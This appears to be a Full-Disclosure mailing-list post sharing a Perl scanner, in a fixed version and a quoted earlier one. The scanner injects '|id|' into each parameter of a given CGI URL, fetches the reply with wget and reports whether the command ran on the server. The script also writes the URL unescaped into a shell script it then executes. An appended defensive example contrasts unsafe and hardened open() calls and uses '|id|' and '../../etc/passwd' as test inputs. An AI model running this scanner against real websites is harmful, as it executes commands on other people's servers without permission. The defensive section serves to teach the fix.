This has a small bug. Gives false positives on some websites, silly me. Here's an updated version:
--- code ---
#!/usr/bin/perl
# oxagast
# Takes a URL of a CGI script with its query string, replaces each
# parameter value in turn with "|id|" (the Perl two-argument open() pipe
# bug), fetches the result with wget and looks for "uid=" in the reply.
if ($ARGV[0] eq "") {
    print " ---=== oxagast's buggy cgi finder ===---\n\n";
    print "Please provide a URL with a CGI script and its args.\n";
    print "ex. $0 \"http://www.example.com/cgi-bin/buggy.cgi?file_name=whateverfile.txt&click_num=0&hello=world\"\n";
    exit;
}

# Split the URL into the script path and its query string, then the
# query string into name=value pairs.
@urlquestionsplit   = split(/\?/, $ARGV[0]);
$baseurl            = $urlquestionsplit[0];
@inputafterquestion = split(/\&/, $urlquestionsplit[1]);
$numofargs          = scalar(@inputafterquestion);

# Collect the value of every parameter.
for $cgiargsplitter (0..$numofargs-1) {
    @cgiaanda = split(/=/, $inputafterquestion[$cgiargsplitter]);
    push @cgiargsaftereq, $cgiaanda[1];
}

# Build one URL per parameter with that value swapped for the probe.
# \Q...\E quotes the value so regex metacharacters in it are literal.
for $thisarg (0..$numofargs-1) {
    $wholestring = $urlquestionsplit[1];
    $wholestring =~ s/\Q$cgiargsaftereq[$thisarg]\E/|id|/;
    push @urltotest, "$baseurl?$wholestring";
}

$exploitable = 0;
for $argnumber (0..$numofargs-1) {
    system("echo \"wget -q -O gettmp \'$urltotest[$argnumber]\'\" > getfile.sh");
    system("chmod u+x getfile.sh");
    system("./getfile.sh");
    @gotstuff = `cat gettmp`;
    $done = 0;
    for $line (0..scalar(@gotstuff)-1) {
        # "uid=" rather than "uid" avoids the false positives of the first version.
        if ($gotstuff[$line] =~ m/uid\=/) {
            if ($done == 0) {
                $done = 1;
                $firstline = $line;
                $gotstuff[$line] =~ m/.*uid(.*)\).*/;
                $uidline = "uid$1)";
                print "Exploitable...\n";
                print "$urltotest[$argnumber]\n";
                print "$uidline\n";
                $exploitable = 1;
            }
        }
    }
    unlink("gettmp", "getfile.sh");
}
if ($exploitable == 0) {
    print "Sorry, not exploitable...\n";
}
--- code ---

On Sun, Jun 20, 2010 at 11:43 PM, Marshall Whittaker < marshallwhitta...@gmail.com> wrote:

> This works on the perl pipe bug. It'll take an arg that's the address of a
> website and its cgi script with some args to the script then figure out if
> it can exploit it and how. It's worked on everything I've tried it on,
> though I have limited test boxes. It's pretty dirty but it works.
>
> #!/usr/bin/perl
> #oxagast
> if (@ARGV[0] eq "") {
>     print " ---=== oxagast's buggy cgi finder ===---\n\n";
>     print "Please provide a URL with a CGI script and its args.\n";
>     print "ex. $0 \"http://www.example.com/cgi-bin/buggy.cgi?file_name=whateverfile.txt&click_num=0&hello=world\"\n";
>     exit;
> }
>
> @urlquestionsplit = split(/\?/, @ARGV[0]);
> $baseurl = @urlquestionsplit[0];
> @inputafterquestion = split(/\&/, @urlquestionsplit[1]);
>
> for $countargs (0..scalar(@inputafterquestion)) {
>     $numofargs = $countargs;
> }
>
> for $cgiargsplitter (0..$numofargs) {
>     @cgiaanda = split(/=/, @inputafterquestion[$cgiargsplitter]);
>     push @cgiargsaftereq, @cgiaanda[1];
> }
> for $thisarg (0..$numofargs-1) {
>     $wholestring = @urlquestionsplit[1];
>     $wholestring =~ s/@cgiargsaftereq[$thisarg]/\|id|/;
>     push @urltotest, "$baseurl?$wholestring";
> }
>
> for $argnumber (0..$numofargs) {
>     system("echo \"wget -q -O gettmp \'@urltotest[$argnumber]\'\" > getfile.sh");
>     system("chmod u+x getfile.sh");
>     system("./getfile.sh");
>     @gotstuff = `cat gettmp`;
>     $done = 0;
>     $exploitable;
>     for $line (0..scalar(@gotstuff)-1) {
>         if (@gotstuff[$line] =~ m/uid/) {
>             if ($done == 0) {
>                 $done = 1;
>                 $firstline = $line;
>                 @gotstuff[$line] =~ m/.*uid(.*)\).*/;
>                 $uidline = "uid$1)";
>                 print "Exploitable...\n";
>                 print "@urltotest[$argnumber]\n";
>                 print "$uidline\n";
>                 unlink(gettemp);
>                 unlink(getfile.sh);
>                 $exploitable = 1;
>             }
>         }
>     }
>     system("rm gettmp getfile.sh");
> }
> if ($exploitable == 0) {
>     print "Sorry, not exploitable...\n";
> }
>
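The "perl pipe bug" the scanner probes for is Perl's two-argument open(): when the mode is taken from the value itself, a parameter beginning or ending with "|" is treated as a command to run rather than a file to read. Added example, not code from the post or its author: the vulnerable read beside the hardened three-argument form with an allow-list check; the sub names and the fixture file are hypothetical.

```perl
#!/usr/bin/perl
# Added example, not part of the original post. Sub names and the
# sample file are hypothetical / constructed for the demonstration.
use strict;
use warnings;
use File::Temp qw(tempdir);

# VULNERABLE: two-argument open() takes the mode from the string itself.
# A value such as "id|" or "|id|" (what the scanner substitutes) is treated
# as a pipe to/from the command id, not as a file name.
sub read_file_unsafe {
    my ($name) = @_;
    open(my $fh, $name) or return undef;   # mode chosen by untrusted data
    local $/;
    my $data = <$fh>;
    close $fh;
    return $data;
}

# HARDENED: three-argument open() fixes the mode, so '|', '<' and '>'
# in $name are ordinary characters. The allow-list keeps the name to a
# single plain file component inside $base (no '/', no '..', no '|').
sub read_file_safe {
    my ($base, $name) = @_;
    return undef unless $name =~ /^[A-Za-z0-9_-]+(?:\.[A-Za-z0-9_-]+)*$/;
    open(my $fh, '<', "$base/$name") or return undef;
    local $/;
    my $data = <$fh>;
    close $fh;
    return $data;
}

# Constructed fixture: one legitimate file in a scratch directory.
my $dir = tempdir(CLEANUP => 1);
open(my $out, '>', "$dir/whateverfile.txt") or die "fixture: $!";
print $out "hello\n";
close $out;

# The legitimate value, the scanner's probe value, and a traversal attempt;
# only the first one is read, the other two are rejected before open().
for my $param ('whateverfile.txt', '|id|', '../../etc/passwd') {
    my $got = read_file_safe($dir, $param);
    printf "%-18s -> %s\n", $param,
        defined $got ? 'read ' . length($got) . ' bytes' : 'rejected';
}
```

Running under taint mode (`perl -T`) adds a third layer, since untrusted CGI input cannot reach open() at all until it has been passed through a regex capture like the one in read_file_safe.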
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/